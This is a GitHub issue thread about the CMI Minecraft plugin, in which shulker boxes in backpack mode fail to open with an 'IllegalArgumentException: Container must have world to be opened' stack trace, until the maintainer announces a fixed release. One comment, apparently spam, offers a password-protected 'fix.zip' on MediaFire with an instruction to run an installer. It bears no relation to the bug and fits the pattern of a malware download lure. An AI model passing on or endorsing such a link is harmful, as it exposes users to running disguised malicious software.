### ISSUE TITLE
Shulker box (backpack mode) does not open and have console error

### ISSUE THREAD

**Issue by Proemmis** [Zrips/CMI#9097]
### Description of Issue

Hi, my players can't open in shift+right click in air the shulkersbox, and i have a console error :

### Version Information

```shell
[16:18:52] [Server thread/INFO]: --------------------------------------------------
[16:18:52] [Server thread/INFO]: CMI: 9.7.5.6 SqLite-> 9.7.5.5
[16:18:52] [Server thread/INFO]: CMILib: 1.5.1.2
[16:18:52] [Server thread/INFO]: Serveur: Spigot 1.12.2-R0.1-SNAPSHOT-
[16:18:52] [Server thread/INFO]: CMI economy: Activé Vault: 1.7.3-b131(CMIEInjector) CMI Chat: Activé
[16:18:52] [Server thread/INFO]: Modules -> 58 activés 8 désactivés: deathMessages, chatBubble, tablist, ranks, playerCombat, votifier, headDrop, jail
[16:18:52] [Server thread/INFO]: --------------------------------------------------
```

### Errors

```shell
[16:19:17] [Server thread/WARN]: [CMILib] Task #326 for CMILib v1.5.1.2 generated an exception
java.lang.IllegalArgumentException: Container must have world to be opened
at com.google.common.base.Preconditions.checkArgument(Preconditions.java:122) ~[guava-21.0.jar:?]
at net.minecraft.entity.player.EntityPlayerMP.func_71007_a(EntityPlayerMP.java:1076) ~[oq.class:?]
at org.bukkit.craftbukkit.v1_12_R1.entity.CraftHumanEntity.openInventory(CraftHumanEntity.java:282) ~[CraftHumanEntity.class:git-CatServer-1.12.2-090a6ffb]
at com.Zrips.CMI.Modules.ShulkerBoxInventory.ShulkerBoxManager.openShulkerBox(ShulkerBoxManager.java:192) ~[?:?]
at com.Zrips.CMI.Modules.ShulkerBoxInventory.ShulkerBoxListener.lambda$1(ShulkerBoxListener.java:217) ~[?:?]
at net.Zrips.CMILib.Version.Schedulers.CMIBukkitImpl.lambda$runTask$0(CMIBukkitImpl.java:33) ~[?:?]
at org.bukkit.craftbukkit.v1_12_R1.scheduler.CraftTask.run(CraftTask.java:76) ~[CraftTask.class:git-CatServer-1.12.2-090a6ffb]
at org.bukkit.craftbukkit.v1_12_R1.scheduler.CraftScheduler.mainThreadHeartbeat(CraftScheduler.java:421) [CraftScheduler.class:git-CatServer-1.12.2-090a6ffb]
at net.minecraft.server.MinecraftServer.func_71190_q(MinecraftServer.java:894) [MinecraftServer.class:?]
at net.minecraft.server.dedicated.DedicatedServer.func_71190_q(DedicatedServer.java:475) [nz.class:?]
at net.minecraft.server.MinecraftServer.func_71217_p(MinecraftServer.java:828) [MinecraftServer.class:?]
at net.minecraft.server.MinecraftServer.run(MinecraftServer.java:687) [MinecraftServer.class:?]
at java.lang.Thread.run(Thread.java:748) [?:1.8.0_312]
```

### Agreements

- [X] My server is supported by CMI.
- [X] My version of CMI at the time of this report is up to date.
- [X] I have searched the github and asked around before making this report.

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Proemmis** [comment]
Same issue with latest version

[17:13:48] [Server thread/WARN]: [CMILib] Task #419 for CMILib v1.5.1.2 generated an exception
java.lang.IllegalArgumentException: Container must have world to be opened
at com.google.common.base.Preconditions.checkArgument(Preconditions.java:122) ~[guava-21.0.jar:?]
at net.minecraft.entity.player.EntityPlayerMP.func_71007_a(EntityPlayerMP.java:1076) ~[oq.class:?]
at org.bukkit.craftbukkit.v1_12_R1.entity.CraftHumanEntity.openInventory(CraftHumanEntity.java:282) ~[CraftHumanEntity.class:git-CatServer-1.12.2-090a6ffb]
at com.Zrips.CMI.Modules.ShulkerBoxInventory.ShulkerBoxManager.openShulkerBox(ShulkerBoxManager.java:192) ~[?:?]
at com.Zrips.CMI.Modules.ShulkerBoxInventory.ShulkerBoxListener.lambda$1(ShulkerBoxListener.java:217) ~[?:?]
at net.Zrips.CMILib.Version.Schedulers.CMIBukkitImpl.lambda$runTask$0(CMIBukkitImpl.java:33) ~[?:?]
at org.bukkit.craftbukkit.v1_12_R1.scheduler.CraftTask.run(CraftTask.java:76) ~[CraftTask.class:git-CatServer-1.12.2-090a6ffb]
at org.bukkit.craftbukkit.v1_12_R1.scheduler.CraftScheduler.mainThreadHeartbeat(CraftScheduler.java:421) [CraftScheduler.class:git-CatServer-1.12.2-090a6ffb]
at net.minecraft.server.MinecraftServer.func_71190_q(MinecraftServer.java:894) [MinecraftServer.class:?]
at net.minecraft.server.dedicated.DedicatedServer.func_71190_q(DedicatedServer.java:475) [nz.class:?]
at net.minecraft.server.MinecraftServer.func_71217_p(MinecraftServer.java:828) [MinecraftServer.class:?]
at net.minecraft.server.MinecraftServer.run(MinecraftServer.java:687) [MinecraftServer.class:?]
at java.lang.Thread.run(Thread.java:748) [?:1.8.0_312]

**Comment by Zrips** [comment]
New version is out with a fix
